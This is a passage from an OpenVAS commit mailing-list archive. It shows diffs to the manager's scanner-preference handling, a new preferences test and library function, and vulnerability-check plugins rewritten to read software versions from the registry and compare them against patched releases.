preference. */ static void -add_scanner_preference (/*@keep@*/ char* preference, /*@keep@*/ char* value) +add_scanner_preference (GHashTable* preferences, + /*@keep@*/ char* preference, + /*@keep@*/ char* value) { - g_hash_table_insert (scanner.preferences, preference, value); + g_hash_table_insert (preferences, preference, value); } @@ -1003,7 +1016,9 @@ { match[0] = '\0'; value = g_strdup (*messages); - add_scanner_preference (current_scanner_preference, value); + add_scanner_preference (current_scanner_preferences, + current_scanner_preference, + value); set_scanner_state (SCANNER_PREFERENCE_NAME); from_scanner_start += match + 1 - *messages; *messages = match + 1; @@ -2127,6 +2142,10 @@ if (sync_buffer ()) return -1; return 0; } + if (scanner.preferences) + g_hash_table_destroy (scanner.preferences); + scanner.preferences = current_scanner_preferences; + current_scanner_preferences = NULL; break; } { @@ -2196,7 +2215,8 @@ set_scanner_state (SCANNER_PORT_HOST); else if (strcasecmp ("PREFERENCES", field) == 0) { - make_scanner_preferences (); + assert (current_scanner_preference == NULL); + current_scanner_preferences = make_scanner_preferences (); set_scanner_state (SCANNER_PREFERENCE_NAME); } else if (strcasecmp ("RULES", field) == 0) Modified: trunk/openvas-manager/src/tests/CMakeLists.txt =================================================================== --- trunk/openvas-manager/src/tests/CMakeLists.txt 2009-10-02 17:48:14 UTC (rev 5358) +++ trunk/openvas-manager/src/tests/CMakeLists.txt 2009-10-03 10:15:27 UTC (rev 5359) @@ -410,6 +410,12 @@ target_link_libraries (omp_get_preferences_1 common) ADD_TEST (omp_get_preferences_1 omp_get_preferences_1) +add_executable (omp_get_preferences_2 omp_get_preferences_2.c) +set_target_properties (omp_get_preferences_2 PROPERTIES COMPILE_FLAGS "${GLIB_CFLAGS} ${OVAS_CFLAGS}") +set_target_properties (omp_get_preferences_2 PROPERTIES LINK_FLAGS "${OVAS_LDFLAG} ${GLIB_LDFLAGS}") +target_link_libraries (omp_get_preferences_2 common) +ADD_TEST (omp_get_preferences_2 omp_get_preferences_2) + add_executable (omp_get_report_0 omp_get_report_0.c) set_target_properties (omp_get_report_0 PROPERTIES COMPILE_FLAGS "${GLIB_CFLAGS} ${OVAS_CFLAGS}") set_target_properties (omp_get_report_0 PROPERTIES LINK_FLAGS "${OVAS_LDFLAG} ${GLIB_LDFLAGS}") Added: trunk/openvas-manager/src/tests/omp_get_preferences_2.c =================================================================== --- trunk/openvas-manager/src/tests/omp_get_preferences_2.c 2009-10-02 17:48:14 UTC (rev 5358) +++ trunk/openvas-manager/src/tests/omp_get_preferences_2.c 2009-10-03 10:15:27 UTC (rev 5359) @@ -0,0 +1,96 @@ +/* Test 1 of OMP GET_PREFERENCES. + * $Id$ + * Description: Test the OMP GET_PREFERENCES command. + * + * Authors: + * Matthew Mundell + * + * Copyright: + * Copyright (C) 2009 Greenbone Networks GmbH + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2, + * or, at your option, any later version as published by the Free + * Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. + */ + +#define TRACE 1 + +#include +#include +#include +#include +#include + +#include "common.h" +#include "../tracef.h" + +int +main () +{ + int socket; + gnutls_session_t session; + entity_t preferences_1, preferences_2; + + setup_test (); + + socket = connect_to_manager (&session); + if (socket == -1) return EXIT_FAILURE; + + if (omp_authenticate_env (&session)) + { + close_manager_connection (socket, session); + return EXIT_FAILURE; + } + + if (omp_get_preferences_503 (&session, &preferences_1)) + { + close_manager_connection (socket, session); + return EXIT_FAILURE; + } + + /* Get the preferences. */ + + if (openvas_server_send (&session, "") == -1) + { + free_entity (preferences_1); + close_manager_connection (socket, session); + return EXIT_FAILURE; + } + + /* Read the response. */ + + preferences_2 = NULL; + read_entity (&session, &preferences_2); + if (preferences_2) print_entity (stdout, preferences_2); + + /* Compare to expected response. */ + + if (preferences_2 + && entity_attribute (preferences_2, "status") + && (strcmp (entity_attribute (preferences_2, "status"), "200") == 0) + && (strcmp (entity_attribute (preferences_2, "status_text"), "OK") == 0)) + { + if (compare_entities (preferences_1, preferences_2) == 0) + { + free_entity (preferences_1); + free_entity (preferences_2); + close_manager_connection (socket, session); + return EXIT_SUCCESS; + } + free_entity (preferences_1); + } + + if (preferences_2) free_entity (preferences_2); + close_manager_connection (socket, session); + return EXIT_FAILURE; +} From scm-commit at wald.intevation.org Sat Oct 3 12:36:55 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Sat, 3 Oct 2009 12:36:55 +0200 (CEST) Subject: [Openvas-commits] r5360 - in trunk/openvas-libraries: . omp Message-ID: <20091003103655.8497F861EADA@pyrosoma.intevation.org> Author: mattm Date: 2009-10-03 12:36:51 +0200 (Sat, 03 Oct 2009) New Revision: 5360 Modified: trunk/openvas-libraries/ChangeLog trunk/openvas-libraries/omp/omp.c trunk/openvas-libraries/omp/omp.h Log: * omp.c (omp_get_preferences_503): New function. * omp.h (omp_get_preferences_503): New header. Modified: trunk/openvas-libraries/ChangeLog =================================================================== --- trunk/openvas-libraries/ChangeLog 2009-10-03 10:15:27 UTC (rev 5359) +++ trunk/openvas-libraries/ChangeLog 2009-10-03 10:36:51 UTC (rev 5360) @@ -1,3 +1,8 @@ +2009-10-03 Matthew Mundell + + * omp.c (omp_get_preferences_503): New function. + * omp.h (omp_get_preferences_503): New header. + 2009-09-30 Matthew Mundell * nasl/openvas_logging.c (openvas_log_func): Pass the correct variable to Modified: trunk/openvas-libraries/omp/omp.c =================================================================== --- trunk/openvas-libraries/omp/omp.c 2009-10-03 10:15:27 UTC (rev 5359) +++ trunk/openvas-libraries/omp/omp.c 2009-10-03 10:36:51 UTC (rev 5360) @@ -989,6 +989,50 @@ } /** + * @brief Get the manager preferences, waiting for them to appear. + * + * @param[in] session Pointer to GNUTLS session. + * @param[out] response On success contains GET_PREFERENCES response. + * + * @return 0 on success, -1 or OMP response code on error. + */ +int +omp_get_preferences_503 (gnutls_session_t* session, entity_t* response) +{ + while (1) + { + const char* status; + + if (openvas_server_send (session, "")) + return -1; + + *response = NULL; + if (read_entity (session, response)) return -1; + + status = entity_attribute (*response, "status"); + if (status == NULL) + { + free_entity (*response); + return -1; + } + if (strlen (status) == 0) + { + free_entity (*response); + return -1; + } + char first = status[0]; + if (first == '2') return 0; + if (strlen (status) == 3 && strcmp (status, "503") == 0) + { + sleep (0.5); + continue; + } + free_entity (*response); + return -1; + } +} + +/** * @brief Get the manager certificates. * * @param[in] session Pointer to GNUTLS session. Modified: trunk/openvas-libraries/omp/omp.h =================================================================== --- trunk/openvas-libraries/omp/omp.h 2009-10-03 10:15:27 UTC (rev 5359) +++ trunk/openvas-libraries/omp/omp.h 2009-10-03 10:36:51 UTC (rev 5360) @@ -86,6 +86,9 @@ omp_get_preferences (gnutls_session_t*, entity_t*); int +omp_get_preferences_503 (gnutls_session_t*, entity_t*); + +int omp_get_certificates (gnutls_session_t*, entity_t*); int From scm-commit at wald.intevation.org Mon Oct 5 08:51:45 2009 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Mon, 5 Oct 2009 08:51:45 +0200 (CEST) Subject: [Openvas-commits] r5361 - in trunk/openvas-plugins: . scripts Message-ID: <20091005065145.56E5D861EABA@pyrosoma.intevation.org> Author: chandra Date: 2009-10-05 08:51:33 +0200 (Mon, 05 Oct 2009) New Revision: 5361 Modified: trunk/openvas-plugins/ChangeLog trunk/openvas-plugins/cve_current.txt trunk/openvas-plugins/scripts/smbcl_CVE-2008-0234.nasl trunk/openvas-plugins/scripts/smbcl_flash_player_CB-A08-0059.nasl trunk/openvas-plugins/scripts/smbcl_gnutls_CB-A08-0079.nasl trunk/openvas-plugins/scripts/smbcl_mozilla.nasl trunk/openvas-plugins/scripts/smbcl_openoffice_CB-A08-0068.nasl trunk/openvas-plugins/scripts/win_CVE-2007-0043.nasl trunk/openvas-plugins/scripts/win_CVE-2007-6026.nasl trunk/openvas-plugins/scripts/win_CVE-2008-0080.nasl trunk/openvas-plugins/scripts/win_CVE-2008-0087.nasl Log: Removed dependency on smbclient Modified: trunk/openvas-plugins/ChangeLog =================================================================== --- trunk/openvas-plugins/ChangeLog 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/ChangeLog 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,17 @@ +2009-10-05 Chandrashekhar B + + * scripts/win_CVE-2008-0080.nasl, + scripts/smbcl_CVE-2008-0234.nasl, + scripts/win_CVE-2007-0043.nasl, + scripts/smbcl_flash_player_CB-A08-0059.nasl, + scripts/smbcl_gnutls_CB-A08-0079.nasl, + scripts/win_CVE-2008-0087.nasl, + scripts/smbcl_openoffice_CB-A08-0068.nasl, + scripts/smbcl_mozilla.nasl, + scripts/win_CVE-2007-6026.nasl: + Re-written as per smb_nt.inc method, to remove dependency on Samba + based smbclient. + 2009-10-02 Michael Meyer * scripts/photopost_detect.nasl, Modified: trunk/openvas-plugins/cve_current.txt =================================================================== --- trunk/openvas-plugins/cve_current.txt 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/cve_current.txt 2009-10-05 06:51:33 UTC (rev 5361) @@ -102,3 +102,12 @@ CVE-2009-3125 Greenbone svn R 36390 Greenbone svn R CVE-2009-3165 Greenbone svn R +CVE-2009-3523 SecPod +CVE-2009-3522 SecPod +CVE-2009-3524 SecPod +CVE-2009-3518 SecPod +CVE-2009-3510 SecPod +CVE-2009-3541 SecPod +CVE-2009-3484 SecPod + + Modified: trunk/openvas-plugins/scripts/smbcl_CVE-2008-0234.nasl =================================================================== --- trunk/openvas-plugins/scripts/smbcl_CVE-2008-0234.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_CVE-2008-0234.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,95 +1,74 @@ +############################################################################# # +# +# # This script was written by Carsten Koch-Mauthe # # This script is released under the GNU GPLv2 # # $Revision: 02 $ +# +# Updated By: +# Antu Sanadi on 16/09/2009 +# +# +############################################################################## if(description) { - script_id(90012); - script_version ("$Revision: 02 $"); - script_cve_id("CVE-2008-2010"); - name = "Buffer overflow in Apple Quicktime Player"; - script_name(name); + script_id(90012); + script_version ("$Revision: 02$"); + script_cve_id("CVE-2008-2010"); + script_name("Buffer overflow in Apple Quicktime Player"); + desc = "The remote host is probable affected by the vulnerabilitys described in + CVE-2008-0234 CVE-2008-2010 - desc = "The remote host is probable affected by the vulnerabilitys described in -CVE-2008-0234 CVE-2008-2010 + Impact + Buffer overflow in Apple Quicktime Player 7.3.1.70 + and other versions before 7.4.1, when RTSP tunneling + is enabled, allows remote attackers to execute + arbitrary code via a long Reason-Phrase response + to an rtsp:// request, as demonstrated using a + 404 error message. -Checking if QuickTime version is less than 7.5 + Unspecified vulnerability in Apple QuickTime Player + on Windows XP SP2 and Vista SP1 allows remote attackers + to execute arbitrary code via a crafted QuickTime media + file. NOTE: as of 20080429, the only disclosure is a + vague pre-advisory with no actionable information. + However, because it is from a well-known researcher, + it is being assigned a CVE identifier for tracking purposes. -Impact - Buffer overflow in Apple Quicktime Player 7.3.1.70 - and other versions before 7.4.1, when RTSP tunneling - is enabled, allows remote attackers to execute - arbitrary code via a long Reason-Phrase response - to an rtsp:// request, as demonstrated using a - 404 error message. - - Unspecified vulnerability in Apple QuickTime Player - on Windows XP SP2 and Vista SP1 allows remote attackers - to execute arbitrary code via a crafted QuickTime media - file. NOTE: as of 20080429, the only disclosure is a - vague pre-advisory with no actionable information. - However, because it is from a well-known researcher, - it is being assigned a CVE identifier for tracking purposes. - -References: + References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0234 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2010 http://lists.apple.com/archives/security-announce/2008/Feb/msg00001.html http://lists.apple.com/archives/Security-announce/2008/Jun/msg00000.html -Solution: + + Solution: All Users should upgrade to the latest version. + Risk factor : High"; -Risk factor : High"; - script_description(desc); - summary = "Test for Buffer overflow in Apple Quicktime Player"; - script_summary(summary); + script_summary("Check the version of Apple Quicktime Player"); script_category(ACT_GATHER_INFO); script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); + script_family("Buffer overflow"); + script_dependencies("secpod_apple_quicktime_detection_win_900124.nasl"); exit(0); } -# -# The code starts here -# include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); - test_version = "7.50.51"; - win_dir = get_windir(); - if( !isnull(win_dir) ) { - test_file[0] = win_dir+"System32\QuickTime.qts"; - test_file[1] = "Programme\QuickTime\QuickTimePlayer.exe"; - test_file[2] = "Program Files\QuickTime\QuickTimePlayer.exe"; - foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less(version: v, test_version: test_version) ) { - security_hole(port:0, proto:"Win_Quicktime"); - report = report + "Fileversion : C$ "+filespec + " "+v+string("\n"); - security_hole(port:0, proto:"Win_Quicktime", data:report); - } - break; - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"Win_Quicktime", data:report); - } - } - } +qtVer = get_kb_item("QuickTime/Win/Ver"); +if(qtVer) +{ + # QuickTime version < 7.50.51 + if(version_is_less(version:qtVer, test_version:"7.50.51")){ + security_hole(0); } - -exit(0); +} Modified: trunk/openvas-plugins/scripts/smbcl_flash_player_CB-A08-0059.nasl =================================================================== --- trunk/openvas-plugins/scripts/smbcl_flash_player_CB-A08-0059.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_flash_player_CB-A08-0059.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,4 @@ +################################################################################## # # This script was written by Carsten Koch-Mauthe # @@ -3,115 +4,114 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to Implement based on 'smb_nt.inc' +# - By Sharath S On 2009-09-14 +# +############################################################################### if(description) { + script_id(90019); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2007-5275", "CVE-2007-6019", "CVE-2007-6243", + "CVE-2007-6637", "CVE-2008-1654", "CVE-2008-1655"); + script_bugtraq_id(26930, 28694, 26966, 27034, 28696, 28697); + script_name("Adobe Flash Player 9.0.115.0 and earlier vulnerability (Win)"); + desc = " + The remote host is probably affected by the vulnerabilities described in + CVE-2007-5275, CVE-2007-6019, CVE-2007-6243, CVE-2007-6637, CVE-2008-1654, + CVE-2008-1655. - script_id(90019); - script_version ("$Revision: 01 $"); - name = "Adobe Flash Player 9.0.115.0 and earlier vulnerability (Win)"; - script_name(name); + Impact: + - CVE 2007-5275 + The Adobe Macromedia Flash 9 plug-in allows remote attackers to cause a + victim machine to establish TCP sessions with arbitrary hosts via a Flash + (SWF) movie, related to lack of pinning of a hostname to a single IP address + after receiving an allow-access-from element in a cross-domain-policy XML + document, and the availability of a Flash Socket class that does not use + the browser's DNS pins, aka DNS rebinding attacks, a different issue than + CVE-2002-1467 and CVE-2007-4324. + - CVE 2007-6019 + Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier, allows + remote attackers to execute arbitrary code via an SWF file with a modified + DeclareFunction2 Actionscript tag, which prevents an object from being + instantiated properly. + - CVE 2007-6243 + Adobe Flash Player 9.x up to 9.0.48.0, 8.x up to 8.0.35.0, and 7.x up to + 7.0.70.0 does not sufficiently restrict the interpretation and usage of + cross-domain policy files, which makes it easier for remote attackers to + conduct cross-domain and cross-site scripting (XSS) attacks. + - CVE 2007-6637 + Multiple cross-site scripting (XSS) vulnerabilities in Adobe Flash Player + allow remote attackers to inject arbitrary web script or HTML via a crafted + SWF file, related to 'pre-generated SWF files' and Adobe Dreamweaver CS3 or + Adobe Acrobat Connect. NOTE: the asfunction: vector is already covered by + CVE-2007-6244.1. + - CVE 2008-1654 + Interaction error between Adobe Flash and multiple Universal Plug and Play + (UPnP) services allow remote attackers to perform Cross-Site Request Forgery + (CSRF) style attacks by using the Flash navigateToURL function to send a SOAP + message to a UPnP control point, as demonstrated by changing the primary DNS + server. + - CVE 2008-1655 + Unspecified vulnerability in Adobe Flash Player 9.0.115.0 and earlier, and + 8.0.39.0 and earlier, makes it easier for remote attackers to conduct DNS + rebinding attacks via unknown vectors. - desc = "The remote host is probably affected by the vulnerabilities described in -CVE-2007-5275, CVE-2007-6019, CVE-2007-6243, CVE-2007-6637, CVE-2008-1654, CVE-2008-1655 + References: + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5275 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6019 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6243 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6637 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1654 + http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1655 -Impact - CVE 2007-5275 - The Adobe Macromedia Flash 9 plug-in allows remote attackers to cause - a victim machine to establish TCP sessions with arbitrary hosts via a - Flash (SWF) movie, related to lack of pinning of a hostname to a single - IP address after receiving an allow-access-from element in a - cross-domain-policy XML document, and the availability of a Flash Socket - class that does not use the browser's DNS pins, aka DNS rebinding attacks, - a different issue than CVE-2002-1467 and CVE-2007-4324. - CVE 2007-6019 - Adobe Flash Player 9.0.115.0 and earlier, and 8.0.39.0 and earlier, - allows remote attackers to execute arbitrary code via an SWF file with - a modified DeclareFunction2 Actionscript tag, which prevents an object - from being instantiated properly. - CVE 2007-6243 - Adobe Flash Player 9.x up to 9.0.48.0, 8.x up to 8.0.35.0, and 7.x - up to 7.0.70.0 does not sufficiently restrict the interpretation and - usage of cross-domain policy files, which makes it easier for remote - attackers to conduct cross-domain and cross-site scripting (XSS) attacks. - CVE 2007-6637 - Multiple cross-site scripting (XSS) vulnerabilities in Adobe Flash - Player allow remote attackers to inject arbitrary web script or HTML - via a crafted SWF file, related to 'pre-generated SWF files' and Adobe - Dreamweaver CS3 or Adobe Acrobat Connect. NOTE: the asfunction: vector - is already covered by CVE-2007-6244.1. - CVE 2008-1654 - Interaction error between Adobe Flash and multiple Universal Plug and Play - (UPnP) services allow remote attackers to perform Cross-Site Request - Forgery (CSRF) style attacks by using the Flash navigateToURL function - to send a SOAP message to a UPnP control point, as demonstrated by changing - the primary DNS server. - CVE 2008-1655 - Unspecified vulnerability in Adobe Flash Player 9.0.115.0 and earlier, - and 8.0.39.0 and earlier, makes it easier for remote attackers to - conduct DNS rebinding attacks via unknown vectors. + Solution: + All Adobe Flash Player users should upgrade to the latest version: + http://get.adobe.com/flashplayer/ + Risk factor : High"; -References: - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5275 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6019 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6243 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6637 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1654 - http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1655 + script_description(desc); + script_summary("Determine the version of Flashplayer"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("Windows"); + script_dependencies("secpod_reg_enum.nasl"); + script_require_keys("SMB/WindowsVersion"); + script_require_ports(139, 445); + exit(0); +} -Solution: - All Adobe Flash Player users should upgrade to the latest version: +include("smb_nt.inc"); +include("version_func.inc"); +include("secpod_smb_func.inc"); -Risk factor : High -"; +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); +} - script_description(desc); - summary = "Determines the Version of Flashplayer"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - exit(0); +filePath = registry_get_sz(key:"SOFTWARE\Microsoft\COM3\Setup", + item:"Install Path"); +if(!filePath){ + exit(0); } -# -# The code starts here -# - -include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); - - sec_hole = 0; - test_version = "9.0.115.0"; - win_dir = get_windir(); - if( !isnull(win_dir) ) { - test_file[0] = win_dir+"System32\Macromed\Flash\NPSWF32.dll"; - test_file[1] = win_dir+"System32\Macromed\Flash\Flash.ocx"; - test_file[2] = win_dir+"System32\Macromed\Flash\Flash6.ocx"; - foreach filespec (test_file) { - r = smbgetdir(share: "C$", dir: filespec, typ: 1 ); - if( !isnull(r) ) { - tmp_filename = get_tmp_dir()+"tmpfile"+rand(); - if( smbgetfile(share: "C$", filename: filespec, tmp_filename: tmp_filename) ) { - v = GetPEFileVersion(tmp_filename:tmp_filename, orig_filename:filespec); - unlink(tmp_filename); - if( version_is_less_equal(version: v, test_version: test_version) ) { - if( sec_hole == 0 ) { - security_hole(port:0, proto:"Win_Flashplayer"); - sec_hole = 1; - } - security_hole(port:0, proto:"Win_Flashplayer", data:"Fileversion : C$ "+filespec + " "+v+string("\n")); - } - } else { - report = string("Error getting SMB-File -> "+get_kb_item("SMB/ERROR")) + string("\n"); - security_note(port:0, proto:"Win_Flashplayer", data:report); - } - } +flashPath = filePath + "\Macromed\Flash\"; +foreach filespec (make_list("NPSWF32.dll", "Flash.ocx", "Flash6.ocx")) +{ + share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:filePath); + file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", + string:flashPath + filespec); + fileVer = GetVer(file:file, share:share); + if(fileVer) + { + if(version_is_less_equal(version:fileVer, test_version:"9.0.115.0")) + { + security_hole(0); + exit(0); } } - -exit(0); +} Modified: trunk/openvas-plugins/scripts/smbcl_gnutls_CB-A08-0079.nasl =================================================================== --- trunk/openvas-plugins/scripts/smbcl_gnutls_CB-A08-0079.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_gnutls_CB-A08-0079.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,4 @@ +################################################################################ # # This script was written by Carsten Koch-Mauthe # @@ -3,19 +4,24 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to implement through 'smb_nt.inc' +#- By Nikita MR on 2009-09-17 +# +################################################################################ if(description) { script_id(90027); - script_version ("$Revision: 01 $"); + script_version ("$Revision: 03$"); script_cve_id("CVE-2008-1948"); - name = "GnuTLS < 2.2.5 vulnerability (Win)"; + name = "GnuTLS < 2.2.4 vulnerability (Win)"; script_name(name); desc = "The remote host is probably affected by the vulnerabilities described in -CVE-2008-1948, CVE-2008-1949, CVE-2008-1950 + CVE-2008-1948, CVE-2008-1949, CVE-2008-1950 -GnuTLS < 2.2.5 vulnerability +GnuTLS < 2.2.4 vulnerability Impact @@ -60,51 +66,25 @@ "; script_description(desc); - summary = "Determines GnuTLS < 2.2.5 vulnerability"; + summary = "Determines GnuTLS < 2.2.4 vulnerability"; script_summary(summary); script_category(ACT_GATHER_INFO); script_copyright("This script is under GPLv2"); - family = "Windows"; + family = "General"; script_family(family); + script_dependencies("gb_gnutls_detect_win.nasl"); + script_require_keys("GnuTLS/Win/Ver"); + script_require_ports(139, 445); exit(0); } -# -# The code starts here -# -include("smbcl_func.inc"); -include("version_func.inc"); -if( check_smbcl() == 0 ) exit(0); +include ("version_func.inc"); -local_var ver, test_version, sec_hole, sec_proto, r, path, share, prog; - -sec_hole = 0; -sec_proto = "GnuTLS"; -ver = NULL; -r = NULL; -test_version = "2.2.5"; - - path = "Programme\"; - share ="C$"; - prog = "GnuTLS*"; - r = smbgetdir(share: share, dir: path+prog, typ: 2 ); - if( isnull(r) ) { - path = "Program Files\"; - r = smbgetdir(share: share, dir: path+prog, typ: 2 ); +gnutlsVer = get_kb_item("GnuTLS/Win/Ver"); +if(gnutlsVer != NULL) +{ + if(version_is_less(version:gnutlsVer, test_version:"2.2.4")){ + security_hole(0); } - if( !isnull(r) ) { - foreach i (keys(r)) { - ver = eregmatch(pattern:"[0-9].*", string:r[i]); - if(!isnull(ver) ) { - if(version_is_less(version:ver[0], test_version:test_version) ) { - if(sec_hole == 0) { - security_hole(port:0, proto:sec_proto); - sec_hole = 1; - } - security_hole(port:0, proto:sec_proto, data:string("\nFound : ")+share + " " + path + r[i] + string("\n")); - } - } - } - } -exit(0); +} Modified: trunk/openvas-plugins/scripts/smbcl_mozilla.nasl =================================================================== --- trunk/openvas-plugins/scripts/smbcl_mozilla.nasl 2009-10-03 10:36:51 UTC (rev 5360) +++ trunk/openvas-plugins/scripts/smbcl_mozilla.nasl 2009-10-05 06:51:33 UTC (rev 5361) @@ -1,3 +1,4 @@ +################################################################################## # # This script was written by Carsten Koch-Mauthe # @@ -3,136 +4,99 @@ # This script is released under the GNU GPLv2 # -# $Revision: 01 $ +# $Revision: 03 $ +# +# Modified to implement through 'smb_nt.inc' +# - By Sharath S On 2009-09-17 +# +############################################################################### if(description) { + script_id(90013); + script_version ("$Revision: 03 $"); + script_cve_id("CVE-2008-1238", "CVE-2008-1240", "CVE-2008-1241"); + script_bugtraq_id(28448); + script_name("Mozilla Firefox, Thunderbird, Seamonkey. Several vulnerabilitys (Win)"); + desc = " + The remote host is probable affected by the vulnerabilities described in + CVE-2008-0416, CVE-2007-4879, CVE-2008-1195, CVE-2008-1233, + CVE-2008-1234, CVE-2008-1235, CVE-2008-1236, CVE-2008-1237, + CVE-2008-1238, CVE-2008-1240, CVE-2008-1241 and more. - script_id(90013); - script_version ("$Revision: 01 $"); - script_cve_id("CVE-2008-1238","CVE-2008-1240","CVE-2008-1241"); - name = "Mozilla Firefox, Thunderbird, Seamonkey. Several vulnerabilitys (Win)"; - script_name(name); + Impact: + Mozilla contributors moz_bug_r_a4, Boris Zbarsky, and Johnny Stenback reported + a series of vulnerabilities which allow scripts from page content to run with + elevated privileges. moz_bug_r_a4 demonstrated additional variants of MFSA + 2007-25 and MFSA2007-35 (arbitrary code execution through XPCNativeWrapper + pollution). Additional vulnerabilities reported separately by Boris Zbarsky, + Johnny Stenback, and moz_bug_r_a4 showed that the browser could be forced to + run JavaScript code using the wrong principal leading to universal XSS + and arbitrary code execution. - desc = "The remote host is probable affected by the vulnerabilitys described in -CVE-2008-0416, CVE-2007-4879, CVE-2008-1195, CVE-2008-1233, -CVE-2008-1234, CVE-2008-1235, CVE-2008-1236, CVE-2008-1237, -CVE-2008-1238, CVE-2008-1240, CVE-2008-1241 and more. + References: + http://www.mozilla.org/security/announce/2008/mfsa2008-14.html + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0412 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0416 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1238 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1240 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1241 + Solution: + All Users should upgrade to the latest versions of Firefox, Thunderbird or + Seamonkey. + http://www.mozilla.com/en-US/firefox/all.html + http://www.seamonkey-project.org/releases/ + http://www.mozillamessaging.com/en-US/thunderbird/all.html -Impact - Mozilla contributors moz_bug_r_a4, Boris Zbarsky, - and Johnny Stenback reported a series of vulnerabilities - which allow scripts from page content to run with elevated - privileges. moz_bug_r_a4 demonstrated additional variants - of MFSA 2007-25 and MFSA2007-35 (arbitrary code execution - through XPCNativeWrapper pollution). Additional - vulnerabilities reported separately by Boris Zbarsky, - Johnny Stenback, and moz_bug_r_a4 showed that the browser - could be forced to run JavaScript code using the wrong - principal leading to universal XSS and arbitrary code execution. - And more... + Risk factor : High"; - -References: - http://www.mozilla.org/security/announce/2008/mfsa2008-14.html - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0412 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0416 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1238 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1240 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1241 - . - . - . - -Solution: - All Users should upgrade to the latest versions of Firefox, Thunderbird or Seamonkey. - - -Risk factor : High"; - - script_description(desc); - summary = "Mozilla Firefox, Thunderbird, Seamonkey. Several vulnerabilitys"; - script_summary(summary); - script_category(ACT_GATHER_INFO); - script_copyright("This script is under GPLv2"); - family = "Windows"; - script_family(family); - exit(0); + script_description(desc); + script_summary("Mozilla Firefox, Thunderbird, Seamonkey. Several vulnerabilities"); + script_category(ACT_GATHER_INFO); + script_copyright("This script is under GPLv2"); + script_family("General"); + script_dependencies("gb_firefox_detect_win.nasl", "gb_seamonkey_detect_win.nasl", + "gb_thunderbird_detect_win.nasl"); + script_require_keys("Firefox/Win/Ver", "Seamonkey/Win/Ver", + "Thunderbird/Win/Ver"); + script_require_ports(139, 445); + exit(0); } -# -# The code starts here -# +include("smb_nt.inc"); include("version_func.inc"); -include("smbcl_func.inc"); -if( check_smbcl() == 0 ) exit(0); - test_version = "2.0.0.14"; # Test Firefox - test_file[0] = "Programme\Mozilla Firefox\firefox.exe"; - test_file[1] = "Prog Files\Mozilla Firefox\firefox.exe"; 